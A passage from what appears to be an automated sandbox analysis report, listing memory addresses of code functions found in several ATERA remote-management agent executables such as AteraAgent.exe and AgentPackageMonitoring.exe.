                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB76943526_2_00007FFAAB769435
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7799D126_2_00007FFAAB7799D1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB76695026_2_00007FFAAB766950
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77871826_2_00007FFAAB778718
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59895629_2_00007FFAAB598956
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5912FB29_2_00007FFAAB5912FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59970229_2_00007FFAAB599702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5B66B029_2_00007FFAAB5B66B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5A5B3129_2_00007FFAAB5A5B31
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5AD35029_2_00007FFAAB5AD350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59073029_2_00007FFAAB590730
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59847632_2_00007FFAAB598476
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5952FA32_2_00007FFAAB5952FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A19B032_2_00007FFAAB5A19B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB596F5932_2_00007FFAAB596F59
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5815FA32_2_00007FFAAB5815FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5915FD32_2_00007FFAAB5915FD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59F1D332_2_00007FFAAB59F1D3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A1AAA32_2_00007FFAAB5A1AAA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A1A8032_2_00007FFAAB5A1A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A1A7832_2_00007FFAAB5A1A78
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59F12032_2_00007FFAAB59F120
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB58083832_2_00007FFAAB580838
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FF01E037_2_00007FFB02FF01E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE20E037_2_00007FFB02FE20E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE696037_2_00007FFB02FE6960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3B88037_2_00007FFB02F3B880
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED033037_2_00007FFB02ED0330
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED231037_2_00007FFB02ED2310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F522B037_2_00007FFB02F522B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5A2F037_2_00007FFB02F5A2F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F7831037_2_00007FFB02F78310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F6C22037_2_00007FFB02F6C220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F2224037_2_00007FFB02F22240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F540A037_2_00007FFB02F540A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4A0C037_2_00007FFB02F4A0C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3C11037_2_00007FFB02F3C110
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4A7E037_2_00007FFB02F4A7E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC273837_2_00007FFB02EC2738
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ECE72037_2_00007FFB02ECE720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F7686037_2_00007FFB02F76860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC886037_2_00007FFB02EC8860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBE80C37_2_00007FFB02EBE80C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FEE5B037_2_00007FFB02FEE5B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F6A5D037_2_00007FFB02F6A5D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FD05D037_2_00007FFB02FD05D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3060037_2_00007FFB02F30600
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBA52437_2_00007FFB02EBA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0051037_2_00007FFB02F00510
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC44DC37_2_00007FFB02EC44DC
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FEC68037_2_00007FFB02FEC680
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F164A037_2_00007FFB02F164A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3455037_2_00007FFB02F34550
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB85D437_2_00007FFB02EB85D4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F6E59037_2_00007FFB02F6E590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9659037_2_00007FFB02F96590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5CC0037_2_00007FFB02F5CC00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE4C8037_2_00007FFB02FE4C80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9AB0037_2_00007FFB02F9AB00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F2CB5037_2_00007FFB02F2CB50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F08B9037_2_00007FFB02F08B90
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F7AA7037_2_00007FFB02F7AA70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB28C037_2_00007FFB02EB28C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F088A037_2_00007FFB02F088A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED6A8037_2_00007FFB02ED6A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF8A6037_2_00007FFB02EF8A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB8A3C37_2_00007FFB02EB8A3C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FA691037_2_00007FFB02FA6910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0E99037_2_00007FFB02F0E990
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC2F8C37_2_00007FFB02EC2F8C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4EFD037_2_00007FFB02F4EFD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBCEA837_2_00007FFB02EBCEA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF902037_2_00007FFB02EF9020
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFAFB037_2_00007FFB02EFAFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F10E3037_2_00007FFB02F10E30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFACD037_2_00007FFB02EFACD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC6CC037_2_00007FFB02EC6CC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EDCE7037_2_00007FFB02EDCE70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F24D0037_2_00007FFB02F24D00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F78D2037_2_00007FFB02F78D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F36D2037_2_00007FFB02F36D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB03000D3037_2_00007FFB03000D30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FECD6037_2_00007FFB02FECD60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB4DB437_2_00007FFB02EB4DB4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F8F3E037_2_00007FFB02F8F3E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBF34037_2_00007FFB02EBF340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB347437_2_00007FFB02EB3474
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4D35037_2_00007FFB02F4D350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED93D037_2_00007FFB02ED93D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4B37037_2_00007FFB02F4B370
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F1F1B037_2_00007FFB02F1F1B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FC320037_2_00007FFB02FC3200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F2F22037_2_00007FFB02F2F220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBD28437_2_00007FFB02EBD284
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE50F037_2_00007FFB02FE50F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4917037_2_00007FFB02F49170
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB11B037_2_00007FFB02EB11B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFD77037_2_00007FFB02EFD770
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB0300184037_2_00007FFB03001840
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FA56D037_2_00007FFB02FA56D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F236E037_2_00007FFB02F236E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ECD83037_2_00007FFB02ECD830
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5772037_2_00007FFB02F57720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0F78037_2_00007FFB02F0F780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FFF79037_2_00007FFB02FFF790
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB955C37_2_00007FFB02EB955C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F1B64737_2_00007FFB02F1B647
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB74B037_2_00007FFB02EB74B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5169037_2_00007FFB02F51690
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC564037_2_00007FFB02EC5640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBD63437_2_00007FFB02EBD634
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFF63037_2_00007FFB02EFF630
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FF3C2037_2_00007FFB02FF3C20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE5AD037_2_00007FFB02EE5AD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F53AF037_2_00007FFB02F53AF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F17B3037_2_00007FFB02F17B30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EDBBE037_2_00007FFB02EDBBE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9DB8037_2_00007FFB02F9DB80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF9BA037_2_00007FFB02EF9BA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F1B9F037_2_00007FFB02F1B9F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EDD91037_2_00007FFB02EDD910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F67A6037_2_00007FFB02F67A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE9A6037_2_00007FFB02EE9A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F118DA37_2_00007FFB02F118DA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE9F3037_2_00007FFB02EE9F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC7F3037_2_00007FFB02EC7F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB7EC037_2_00007FFB02EB7EC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F65EA037_2_00007FFB02F65EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F57EA037_2_00007FFB02F57EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F33EB037_2_00007FFB02F33EB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4FED037_2_00007FFB02F4FED0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0FEF037_2_00007FFB02F0FEF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F45F2037_2_00007FFB02F45F20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF9CF037_2_00007FFB02EF9CF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF7E7037_2_00007FFB02EF7E70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F8DCC037_2_00007FFB02F8DCC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9BCD037_2_00007FFB02F9BCD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC5E5037_2_00007FFB02EC5E50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F87D2037_2_00007FFB02F87D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE3E1037_2_00007FFB02EE3E10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB5A0FAA37_2_00007FFAAB5A0FAA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB59F73D37_2_00007FFAAB59F73D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB59CC7B37_2_00007FFAAB59CC7B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB5A0FDE37_2_00007FFAAB5A0FDE
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB59BD5137_2_00007FFAAB59BD51
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB7B2AEB37_2_00007FFAAB7B2AEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB7B240837_2_00007FFAAB7B2408
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB7B31C637_2_00007FFAAB7B31C6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB7BEFA837_2_00007FFAAB7BEFA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB7BACF837_2_00007FFAAB7BACF8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8C34B137_2_00007FFAAB8C34B1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8C0B8837_2_00007FFAAB8C0B88
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8CF94937_2_00007FFAAB8CF949
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8C58E737_2_00007FFAAB8C58E7
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8B403D37_2_00007FFAAB8B403D
